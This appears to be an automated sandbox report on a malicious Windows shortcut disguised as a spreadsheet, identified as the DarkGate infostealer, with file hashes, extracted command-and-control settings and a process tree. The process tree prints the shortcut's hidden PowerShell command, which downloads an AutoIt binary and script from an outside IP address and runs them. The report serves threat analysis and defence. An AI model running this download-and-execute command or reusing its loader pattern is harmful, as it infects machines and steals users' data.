Overview

overview

10

Static

static

1

October-FTDs.xlsx.lnk

windows10-1703-x64

10

Analysis

  • max time kernel
    310s
  • max time network
    400s
  • platform
    windows10-1703_x64
  • resource
    win10-20231023-en
  • resource tags

    arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26-10-2023 23:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    October-FTDs.xlsx.lnk

  • Size

    1KB

  • MD5

    f0a7c9b3858cfda3f16de7fa7a7958a8

  • SHA1

    8777be6f9c0806cbd82cdac30a38403ebe2187de

  • SHA256

    06cc011f34188a2156c18c1307fd625ac9a2ed916a4c7e01b40513a826bd24d0

  • SHA512

    6258cd5da428864b0af3f96d1fce28a1efa04cf4d309bf65744e4c205b95a932ef69778b0fe61939c8d9736271b33c375f18e36785dc2e2888316248b723157d

Score
10/10
darkgatecivilian1111stealer

Malware Config

Extracted

Family

darkgate

Botnet

civilian1111

C2

http://185.130.226.220

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    true

  • anti_debug

    true

  • anti_vm

    true

  • c2_port

    2351

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_rawstub

    true

  • crypto_key

    vsAuhYDgOqBrvG

  • internal_mutex

    txtMut

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    5

  • rootkit

    true

  • startup_persistence

    true

  • username

    civilian1111

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\October-FTDs.xlsx.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "&{ Invoke-WebRequest -Uri "http:/\194.26.192.233/AutoIt3.exe" -OutFile "C:\Users\Public\AutoIt3.exe"; Invoke-WebRequest -Uri "http:/\194.26.192.233/bone.au3" -OutFile "C:\Users\Public\bone.au3"; Invoke-WebRequest -Uri "http://194.26.192.233/document.xlsx" -OutFile "C:\Users\Public\Documents\document.xlsx"; "C:\Users\Public\AutoIt3.exe C:\Users\Public\bone.au3"; C:\Users\Public\Documents\document.xlsx }"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5000
      • C:\Users\Public\AutoIt3.exe
        "C:\Users\Public\AutoIt3.exe" C:\Users\Public\bone.au3
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        PID:2216

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1pdf3gcs.qff.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit

  • C:\Users\Public\AutoIt3.exe
    Filesize

    872KB

    MD5

    c56b5f0201a3b3de53e561fe76912bfd

    SHA1

    2a4062e10a5de813f5688221dbeb3f3ff33eb417

    SHA256

    237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

    SHA512

    195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

    Download Submit

  • C:\Users\Public\bone.au3
    Filesize

    489KB

    MD5

    df26679034f7cb5a69fd065e54dc5fc0

    SHA1

    4a7a998ac1f903378f446d902f1be05c23772965

    SHA256

    7f0624141092f91ca74a6bf5c51408b445224ed6e504329acb04fee609a897cd

    SHA512

    81f41adf9bd72fe51ae8c3f4914c30d4533594afb1f11438d389319fa94a9fac691cd718c2cb1ab75cc2d877805a8c899af6d0dd5ad1b2634c2fd7fc5ad326eb

    Download Submit

  • memory/2216-66-0x00000000013F0000-0x00000000017F0000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2216-68-0x0000000003FC0000-0x00000000042EA000-memory.dmp

    Filesize

    3.2MB

    Download

  • memory/5000-9-0x000001F517930000-0x000001F517940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5000-27-0x000001F517930000-0x000001F517940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5000-41-0x000001F5308F0000-0x000001F531096000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/5000-51-0x000001F517930000-0x000001F517940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5000-12-0x000001F52FF90000-0x000001F530006000-memory.dmp

    Filesize

    472KB

    Download

  • memory/5000-6-0x000001F52FA80000-0x000001F52FAA2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5000-8-0x000001F517930000-0x000001F517940000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5000-7-0x00007FF857220000-0x00007FF857C0C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/5000-69-0x00007FF857220000-0x00007FF857C0C000-memory.dmp

    Filesize

    9.9MB

    Download